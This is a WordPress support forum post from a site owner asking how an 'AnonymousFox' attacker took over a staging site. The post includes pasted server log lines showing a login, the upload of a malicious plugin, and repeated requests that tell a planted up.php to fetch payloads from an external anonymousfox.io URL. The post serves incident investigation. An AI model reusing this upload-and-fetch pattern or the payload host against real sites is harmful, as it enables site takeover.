AnonymousFox hack on staging website with almost no plugins. How?
-
Hi, today a website I’m working on got strangely hacked.
The website is blocked to search engines. I’m using the _underscores theme as a base to create a custom theme.
I have just these plugins installed:
- Disable Comments
- Meta Box
- Yoast Duplicate Post
- Yoast SEO
Today my password changed and my username became “AnonymousFox”.
Thanks to another administrator we deleted this account and created another one for me with a different password than before.I know that “AnonymousFox” is related to the old exploit of WordPress 5.5 and the plugin “WP File Manager” (https://www.brightvessel.com/anonymous-fox-wordpress-5-5-hack-should-i-be-concerned/).
The point is that my WordPress version was up-to-date and I didin’t have “WP File Manager” installed.
After some investigations we found a plugin called Three Column Screen Layout. It was disabled and after looking at the files we found out that there were some malicious code. We deleted it.
Then we found this requests in the server log from a different IP address than ours:
200 - POST /wp-login.php HTTP/1.0 200 - GET /wp-admin/ HTTP/1.0 200 - GET /wp-admin/plugin-install.php?tab=upload HTTP/1.0 200 - POST /wp-admin/update.php?action=upload-plugin HTTP/1.0 200 - GET /wp-content/plugins/aekwrpxkla/up.php HTTP/1.0 500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0 500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0 500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p2.txt HTTP/1.0 200 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0 500 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0 200 - POST /wp-content/plugins/aekwrpxkla/up.php?php=anonymousfox.io/_@_v5/p1.txt HTTP/1.0
So, my question is: how did they manage to upload this malicious plugin and changed my username and password?
Looking at the log it seems that they just logged in, uploaded the hacked plugin and called one of the malicious files.
We used WordFence and Quttera malware scanner without finding anything suspicious.
What could have happened? My password was too weak? One of the installed plugin has an exploit?
Thanks for the help and for reading this much.
- The topic ‘AnonymousFox hack on staging website with almost no plugins. How?’ is closed to new replies.